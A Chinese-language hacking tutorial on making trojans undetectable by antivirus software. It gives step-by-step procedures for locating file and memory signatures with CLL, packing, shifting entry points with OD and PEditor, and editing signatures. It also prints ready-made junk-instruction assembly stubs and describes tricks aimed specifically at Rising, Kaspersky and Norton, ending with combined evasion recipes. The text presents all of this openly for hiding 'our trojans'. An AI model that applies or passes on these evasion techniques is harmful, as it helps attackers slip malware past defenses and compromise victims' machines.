1        打开CLL

2        选择设置中的总体参数，，，，，选中文件特征码手动定位，，，，以及路径

3选中设置中的手动参数，，，，，选择替换方式选中，，，总共生成规定个数的文件，，，生成个数为1000

4选择文件中的特征码检测，，文件特征码检测，，，打开程序（要定位特证码的程序）

5在弹出的PE窗口中直接点确定，之后弹出的窗口在点确定

6然后等CLL生成完毕之后用杀毒软件进行查杀

7在CLL中选操作，结果定位，选中刚刚用来存放检测结果的文件夹

8在CLL中选文件，保存结果

这时就是手动检测出来的特征码了

⑵.自动定位.

1>.学习自动定位相关参数设置。打开CLL 选设置，总体参数,选中文件/内存特征码自动定位，和保存位置

这里要注意生成文件的时间，必须要保证在这个时间内杀软能够删除有毒文件，否则定位不精确，一般3-6秒

至于替换的字节应该根据文件大小，文件大可以设置大点。

2>.开启卡巴的实时监控并设置在检测到染毒对象采取的操作为“删除染毒对象。然后用不停的用右键来刺激所生成的文件。

3>.最后保存定位的结果。然后打开UE把特证码所在位置替换为0，在次杀毒，如果没报毒，证明定位结果准确

这样自动定位也就完成了

⑶ 小技巧快速定位

用CLL打开需要定位的文件，把其中的一个区段全部替换为0，然后点生成，一般生成几个文件就OK了，然后杀毒，如果没报毒就证明特证码就在这个区段，然后就可以针对这个区段用小字节替换来定位，如果报毒就换另外一个区段，这样能够省不少时间。

⑷ 内存特证码定位

为什么要定位内存特证码？

我们通过学习知道，当我们加了壳，加了花指令，或改了入口点。表面终于是躲过查杀了，但一运行木马程序，却被内存查杀。说明杀毒软件具有内存查杀功能，要得到全面的免杀，还必须定位内存特征码，修改内存特征码，才能达到内存免杀。

　　在讲定位内存特征码前，先要分析国内外著名杀毒软件的内存查杀特点。大家在使用木马过程都会发现，内存查杀，一般都指得被瑞星的内存查杀。瑞星的内存查杀功能是同类杀毒软件中最强的一款杀毒软件。像强悍的卡巴，金山，它们的内存查杀意义不大,会制作免杀木马的人都知道,像这类杀毒软件,只要文件免杀,内存也就免杀了.还有江民也有内存查杀功能,但内存查杀功能比较弱.只针对影响力非常大的病毒程序.一般的黑客软件都没有提取内存特征码.在以后的木马免杀技巧之独门绝巧篇中,会专门研究每种杀毒软件的特点,有

专门对付每种杀毒软件免杀的对策.

内存特证码和定位文件特证码差不多，不过要记得把文件特怔码先给替换掉。多多练习就能够熟练掌握内存特证码定位方法。

另外需要注意的是文件在没定位特证码以前看下报的是什么病毒，如果在定位过程中发现病毒名变化那就证明已经定位出一处特证码了[因为有些杀软定位特证码不止一处]这样可以避免走很多的弯路，这是我长期得到的教训。





3.文件免杀之加壳与改入口点法（修改篇）


一.壳的相关知识：
1.壳的分类：压缩壳和加密壳
2.壳的作用：保护和文件免杀
二.加壳免杀的几个弱点

1.不能躲过像瑞星这类具有内存查杀功能的杀毒软件。

2.一般不能躲过卡巴的查杀
因为卡巴采用了一种叫虚拟机技术。首先把加了多层壳的木马程序在虚拟机环境下运行一下，这样木马程序就会现出本来面目，这样无论你加了多少层壳，在运行后程序还是要暴露自已的。所以大家在加壳测试过程中也会发现，能过其它的多种杀毒软件，但卡巴始终很难过，其原因就是卡巴的虚拟技术在作怪。

三.是不是现在的加壳免杀已失去意义
    每种免杀技术都有他的缺点和优点，比如加壳，首先要找到比较生僻的壳,而且可能以后很快被查杀.同时也不能过内存查杀,也很难过卡巴.但它操作方便,通用性好加一个壳,可能过好几个杀毒软件.又比如修改特征码.首先操作比较烦,要定位,要修改,改好后还要测试是否能正常使用.同时针对性非常强.只能针对某一种杀毒软件的免杀,各种杀毒软件的特征码都不一样,所以要躲过多种杀毒软件查杀,就要分别定位,修改每种杀毒软件的特征码.这样是相当麻烦的.但它可以通过修改特征码来躲过瑞星内存和卡巴的查杀.

所以以后免杀技术会把加壳,加花指令,改入口点,改特征码这几种方法结合起来使用.对付瑞星的内存查杀,我们可以修改内存特征码,对付卡巴的虚拟机技术.我们可以修改卡巴的特征码.在加上加冷门壳,加花指令,改入口点.综合这些方法就可以打造金钢不死之身!

四.加壳免杀实例演示部分:
1.加生僻壳免杀:实例演示
2.加伪装壳免杀:实例演示
3.多重加壳免杀:（用木马彩衣进行多重加壳）


五.改入口点免杀法:
1.改入口点免杀原理:杀毒软件一般都检测病毒还原之后的代码,而且一般都把代码段开始的前40个字节作为特征值.入口点改变了,说明也就破坏了特征码,这样就达到免杀的效果.

2.改入口点免杀方法一:入口地址加1法.
    操作步骤:
    第一步:配置一个无壳的木马服务端.
    第二步:用PEditor打开木马程序服务端.在入口点处的地址加1.然后点应用更改就可以了.
评论:该方法对不同木马程序,有不同的效果,其它杀毒软件一般都可以躲过,但有些程序改过后还是被卡巴查杀.同时也不能过内存查杀,但以后结合加花指令,加壳等等方法,效果将非常不错.


3.改入口点免杀方法二:变换入口地址法.
    操作步骤:
    第一步:用OD载入无壳木马程序服务端.
    第二步:把入口点的开始二句代码(大都为push ebp mov ebp,esp).移到零区域也是就空白区域地方.并记下零区域的内存地址.同时在后面加一句跳转命令:JMP 到第三条指令的地址.
    第三步:然后修正并保存,最后用PEditor打开该程序.把入口点改成刚才在零区域记下的内存地址.

    评论:该方法效果比方法一要好.经测试,用方法一改过后被卡巴查出来,用方法二就查不出来. 以后可以结合加花指令,加壳,改特征码,打造金钢不死之身!


采用以上的方法可以躲过不少杀毒软件的追杀，并且方便快速，又很简单，所以是免杀里非常主要的手段，但是一定要检查文件是不是能够正常运行。





4.文件免杀之加花指令法


一.花指令相关知识：
　其实是一段垃圾代码，和一些乱跳转，但并不影响程序的正常运行。加了花指令后，使一些杀毒软件无法正确识别木马程序，从而达到免杀的效果。
二.加花指令使木马免杀制作过程详解：

　　第一步：配置一个不加壳的木马程序。

　　第二步：用OD载入这个木马程序，同时记下入口点的内存地址。

　　第三步：向下拉滚动条，找到零区域（也就是可以插入代码的都是0的空白地方）。并记下零区域的起始内存地址。

　　第四步：从这个零区域的起始地址开始一句一句的写入我们准备好的花指令代码。

　　第五步：花指令写完后，在花指令的结束位置加一句：JMP　刚才OD载入时的入口点内存地址。

　　第六步：保存修改结果后，最后用PEditor这款工具打开这个改过后的木马程序。在入口点处把原来的入口地址改成刚才记下的零区域的起始内存地址，并按应用更改。使更改生效。　　　　　　　　

三.加花指令免杀技术总节：

　1.优点：通用性非常不错，一般一个木马程序加入花指令后，就可以躲大部分的杀毒软件，不像改特征码，只能躲过某一种杀毒软件。

　2.缺点：这种方法还是不能过具有内存查杀的杀毒软件，比如瑞星内存查杀等。

　3.以后将加花指令与改入口点，加壳，改特征码这几种方法结合起来混合使用效果将非常不错。

四.加花指令免杀要点：

由于黑客网站公布的花指令过不了一段时间就会被杀软辨认出来，所以需要你自己去搜集一些不常用的花指令，另外目前还有几款软件可以自动帮你加花，方便一些不熟悉的朋友，例如花指令添加器等。

五.常见花指令代码

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
1。 VC++ 5.0
PUSH EBP
MOV EBP,ESP
PUSH -1
push 515448
PUSH 6021A8
MOV EAX,DWORD PTR FS:[0]
PUSH EAX
MOV DWORD PTR FS:[0],ESP
ADD ESP,-6C
PUSH EBX
PUSH ESI
PUSH EDI
jmp 跳转到程序原来的入口点

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
2。c ++
push ebp
mov ebp,esp
push -1
push 111111
push 222222
mov eax,fs:[0]
push eax
mov fs:[0],esp
pop eax
mov fs:[0],eax
pop eax
pop eax
pop eax
pop eax
mov ebp,eax
jmp 跳转到程序原来的入口点

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
3。跳转
somewhere:
      nop                    /"胡乱"跳转的开始...
      jmp 下一个jmp的地址    /在附近随意跳
      jmp ...                /...
      jmp 原入口的地址      /跳到原始oep

--------------------------------------------------
新入口: push ebp
        mov ebp,esp
        inc ecx
        push edx
        nop
        pop edx
        dec ecx
        pop ebp
        inc ecx
        loop somewhere        /跳转到上面那段代码地址去！

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
4。Microsoft Visual C++ 6.0

push ebp
mov ebp,esp
PUSH -1
PUSH 0
PUSH 0
MOV EAX,DWORD PTR FS:[0]
PUSH EAX
MOV DWORD PTR FS:[0],ESP
SUB ESP,68
PUSH EBX
PUSH ESI
PUSH EDI
POP EAX
POP EAX
POP EAX
ADD ESP,68
POP EAX
MOV DWORD PTR FS:[0],EAX
POP EAX
POP EAX
POP EAX
POP EAX
MOV EBP,EAX
JMP 原入口

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

5。
在mov ebp,eax
后面加上
PUSH EAX
POP EAX
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
6.
push ebp
mov ebp,esp
add esp,-0C
add esp,0C
mov eax,403D7D
push eax
retn

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
push ebp
mov ebp,esp
push -1
push 00411222
push 00411544
mov eax,dword ptr fs:[0]
push eax
mov dword ptr fs:[0],esp
add esp,-6C
push ebx
push esi
push edi
add byte ptr ds:[eax],al
jo 入口
jno 入口
call 下一地址

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
7.

push ebp
nop
nop
mov ebp,esp
inc ecx
nop
push edx
nop
nop
pop edx
nop
pop ebp
inc ecx
loop 任意地址
nop
nop

———————————————
nop
nop
jmp 下一个jmp的地址    /在附近随意跳

nop
jmp 下一个jmp的地址    /在附近随意跳

nop
jmp 下一个jmp的地址    /在附近随意跳

jmp 入口





5.文件免杀之文件特征码修改五大法宝


方法一:修改字符串大小写法

1.修改方法:把特征码所对应的内容是字符串的,只要把大小字互换一下就可以了.

2.适用范围:特征码所对应的内容必需是字符串,否则不能成功.

　　方法二:直接修改特征码的十六进制法

1.修改方法:把特征码所对应的十六进制改成数字差1或差不多的十六进制.

2.适用范围:一定要精确定位特征码所对应的十六进制,修改后一定要测试一下能否正常使用.
　
　　方法三:指令顺序调换法

1.修改方法:把具有特征码的代码顺序互换一下.

2.适用范围:具有一定的局限性,代码互换后要不能影响程序的正常执行。

　　方法四:通用跳转法

1.修改方法:把特征码移到零区域(指代码的空隙处),然后一个JMP又跳回来执行.

2.适用范围:没有什么条件,是通用的改法,强烈建议大家要掌握这种改法.

　　方法五:等价替换法

1.修改方法:把特征码所对应的汇编指令命令中替换成功能类似的指令.

2.适用范围:特征码中必需有可以替换的汇编指令.替换后指令功能要不变比如JN,JNE 换成JMP，这里要对汇编要比较熟悉，读懂指令后可以替换功能相同的指令。也可以去查8080汇编手册[计算机专栏里有]

实站特怔码免杀

第一步：首先用内存定位法来准确定位瑞星内存特征码的具体位置

　第一阶段：自动参数中，生成文件间隔秒数设为4，最小替换字节数设为100字节。（主要用于大体定位内存特征码）

第二阶段：自动参数中，生成文件间隔秒数设为4.最小替换字节数设为4字节。（主要用于准确定位内存特征码）

第二步：修改特征码

　　　用OD打开文件，找到特怔码所在位置，并且判断适合用那种方法修改，如果对方法不太熟悉，并且特怔码不止一处，那就需要你改一处就保存并且在虚拟机里试验能否正常运行[虚拟机可是做免杀的必备工具，强烈建议你安装，因为你不可能就在自己的机器上运行木马吧？在说也不可能在你机器上同时安装N种杀软，那你机器不慢死，更重要还可以用来试验别人提供的软件有没有木马]



6.木马免杀技术之独门绝技

绝技一：快速搞定瑞星文件查杀
操作步骤：

　第一步：用OD载入，来到程序的入口点。

　第二步：把入口点的第一句PUSH　EBP　改成POP　EBP　然后保存就可以躲过瑞星的表面查杀。


绝技二：快速定位与修改瑞星内存特征码

原理：因为目前的内存查杀杀毒软件，只有瑞星才能威胁到我们的木马。也就是说只要搞定瑞星的内存查杀，那我们的木马在内存就畅通无阻了. 但由于技术原因,目前瑞星的内存特征码在90%以上把字符串作为病毒特征码,

这样对我们的定位和修改带来了方便.


操作步骤:

第一步:首先用特征码定位器大致定位出瑞星内存特征码位置.

第二步:然后用UE打开,找到这个大致位置,看看,哪些方面对应的是字符串,用0替换后再用内存查杀进行查杀.直到找到内存特征码后,只要把字符串的大小写互换就能达到内存免杀效果.



绝技三:如何快速躲过诺顿的查杀

诺顿的查杀特点:大家有时候会发现,通过改特征码,加花指令,改内存特征码,等等,卡巴,江民,金山,瑞星都过了,但无论如何都过不了诺顿,这时候是不是感到很纳闷.其实诺顿特征码的定义和其它杀毒软件不一样,其它杀毒软件的特征码都在代码段而只有它把特征码定义在PE头文件里面.而在头文件里面,一般都用字符串作为病

毒特征码,知道了原理,就有下面的二种方法来应付.


方法一:只要把头文件的字符串的大小字互换一下就可以搞定了.

方法二:有二款压缩软件WinUpack和北斗星,经过他们的压缩,会把我们的木马程序的头文件改的面目全非.所以把我们的木马做好其它的杀毒软件的免杀后,再用这二款压缩软件的压缩就可以躲过诺顿的查杀.



绝技四:一个不太通用的免杀方法

免杀方法一:把入口点第三句开始的几行(20字节内)汇编代码移到零区域去执行,也达到一定的免杀效果.


绝技五:用VC++加了花指令后入口点下移法

操作过程:加花指令后,可以把入口点下移好一位,这样可以进一步达到免杀效果.



一.木马免杀综合方案


修改内存特征码--->1>入口点加1免杀法 1>加压缩壳1>--->再加壳或多重加壳

                  2>变化入口地址免杀法 2>加生僻壳--->2>加壳的伪装.
                  3>加花指令法免杀法 3>加压缩壳3>--->打乱壳的头文件

                  4>修改文件特征码免杀法

以上免杀方法可以自由组合成多种不同的免杀方案。


二.常用免杀方案

1.实例完全免杀方案一：

内存特征码修改＋加UPX壳＋秘密行动打乱壳的头文件。